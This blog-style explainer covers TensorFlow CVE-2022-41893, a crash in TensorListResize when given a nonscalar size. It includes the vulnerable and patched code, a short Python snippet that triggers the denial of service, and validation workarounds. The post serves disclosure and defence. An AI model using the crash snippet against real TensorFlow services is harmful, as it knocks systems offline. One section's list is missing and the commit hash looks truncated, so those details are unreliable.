TensorFlow is a major open source platform for machine learning used in research, production, and countless critical machine learning systems. However, even the most dependable software can have flaws, and in late 2022, a significant vulnerability (CVE-2022-41893) was discovered in a key TensorFlow operation, putting user systems at risk of denial-of-service attacks. In this in-depth post, you’ll learn exactly what the vulnerability is, how it can be exploited, the specifics of the underlying code, and what you need to do to keep your environment safe.

What is CVE-2022-41893?

CVE-2022-41893 is a vulnerability in TensorFlow, specifically in the way the raw operation tf.raw_ops.TensorListResize handles its inputs. When the size argument is not a scalar (for example, a list or vector instead of a single number), TensorFlow triggers a CHECK failure. By deliberately sending such input, an attacker can crash the Python process running TensorFlow, causing a denial-of-service (DoS).

This is especially serious when TensorFlow runs in a critical, unattended, or remote environment, such as cloud APIs or production ML systems.

The dangerous code, from the TensorFlow source (paraphrased and simplified for clarity):

// Vulnerable code prior to fix
void TensorListResize(const OpKernelContext* ctx, ... ,
                      const Tensor& size_input) {
    // Expects size_input to be scalar; doesn't check or handle otherwise
    CHECK(size_input.dims() == 0);
    ...
}

CHECK is a macro that forces the process to abort if its condition isn’t met. If the input isn’t a scalar, the operation will immediately crash the process.

Attackers can call this operation with a malformed size input, leading to an intentional crash. Here’s a Python snippet that demonstrates the exploit:

import tensorflow as tf

# Create a dummy TensorList (max_num_elements is a required input; -1 means unbounded)
dummy_tensorlist = tf.raw_ops.EmptyTensorList(
    element_shape=[1], max_num_elements=-1, element_dtype=tf.float32)

# Malicious nonscalar 'size' input
bad_size = tf.constant([10, 20], dtype=tf.int32)  # Not a scalar

# This call will crash TensorFlow! (TensorListResize takes only input_handle and size)
tf.raw_ops.TensorListResize(input_handle=dummy_tensorlist, size=bad_size)

On affected versions, running the above code will trigger a hard crash on any system.

Patch and Remediation

The TensorFlow team addressed this flaw in commit 888e34b49009a4e734c27abc43bb5102682c56:

// Fixed code after patch
void TensorListResize(const OpKernelContext* ctx, ... ,
                      const Tensor& size_input) {
    OP_REQUIRES(ctx, size_input.dims() == 0,
        errors::InvalidArgument("Expected scalar size input"));
    ...
}

Instead of crashing, the operation will now return a user-friendly error, keeping your process alive and helping debug the problem.

See the official advisory and commit:

- TensorFlow GHSA-4h9j-7cw8-jjp4 / CVE-2022-41893 advisory
- Patched commit 888e34b49009a4e734c27abc43bb5102682c56

How to Protect Your Environment

- Upgrade TensorFlow: If you run 2.7 or older, upgrade to a supported version (2.8.4, 2.9.3, 2.10.1, or 2.11+) that has the patch.  
- Don’t trust user input: If you expose TensorFlow for API or user-side consumption, validate input before it reaches the backend.
- Code-level workaround: If you are unable to upgrade, wrap any call to tf.raw_ops.TensorListResize and check that the size is a scalar:

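import tensorflow as tf

def safe_tensorlist_resize(handle, size):
    # Reject anything that is not rank 0 (a scalar) before it reaches the kernel
    if tf.rank(size) != 0:
        raise ValueError("size argument must be a scalar")
    # TensorListResize takes only input_handle and size
    return tf.raw_ops.TensorListResize(input_handle=handle, size=size)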
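
The "don't trust user input" advice can also be enforced at the API boundary, before any tensor is built from the request. The following is an added example, not code from TensorFlow or from the original post; validate_resize_size, InvalidSize, FakeTensor and the MAX_LIST_SIZE upper bound are hypothetical names and assumptions, and the range check goes beyond the scalar check the advisory requires.

```python
import operator

MAX_LIST_SIZE = 1_000_000  # hypothetical service limit, not a TensorFlow constant


class InvalidSize(ValueError):
    """The caller-supplied size must not be passed to TensorListResize."""


def validate_resize_size(value, max_size=MAX_LIST_SIZE):
    """Return `value` as a plain int if it is a scalar integer in [0, max_size]."""
    if isinstance(value, bool):  # bool is an int subclass; refuse it explicitly
        raise InvalidSize("size must be an integer, not a bool")
    shape = getattr(value, "shape", None)
    if shape is not None:
        # Array-like input (NumPy array, tf.Tensor): rank = length of static shape.
        try:
            rank = len(shape)
        except (TypeError, ValueError):  # shape whose rank is unknown
            raise InvalidSize("size has unknown rank") from None
        if rank != 0:
            raise InvalidSize(f"size must be a scalar, got rank {rank}")
    try:
        n = operator.index(value)  # rejects lists, floats, strings, None
    except TypeError:
        raise InvalidSize(f"size must be an integer, got {type(value).__name__}") from None
    if not 0 <= n <= max_size:
        raise InvalidSize(f"size {n} outside [0, {max_size}]")
    return n


class FakeTensor:
    """Constructed stand-in for an array-like value, so the demo needs no TensorFlow."""

    def __init__(self, data, shape):
        self.data, self.shape = data, shape

    def __index__(self):
        return self.data


if __name__ == "__main__":
    # Constructed inputs; [10, 20] is the nonscalar size from the snippet above.
    for sample in (5, FakeTensor(7, ()), [10, 20], FakeTensor([10, 20], (2,)), 2.5, True):
        try:
            print("accepted:", validate_resize_size(sample))
        except InvalidSize as exc:
            print("rejected:", exc)
```

The returned plain int is the value to pass as size to tf.raw_ops.TensorListResize.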

Why Does This Matter?

Even though Denial-of-Service is sometimes viewed as less severe than code execution, it can be devastating in the wrong context:

Conclusion

The CVE-2022-41893 TensorFlow vulnerability shows how small type-safety bugs can have serious effects in widely-used software. If you use TensorFlow, make sure you are running a patched version. If you maintain public ML APIs or cloud inference solutions, update and audit your code for similar input validation issues.

References

- TensorFlow Security Advisory GHSA-4h9j-7cw8-jjp4
- Patched commit 888e34b49009a4e734c27abc43bb5102682c56  
- TensorFlow release notes

Timeline

Published on: 11/18/2022 22:15:00 UTC
Last modified on: 11/22/2022 20:50:00 UTC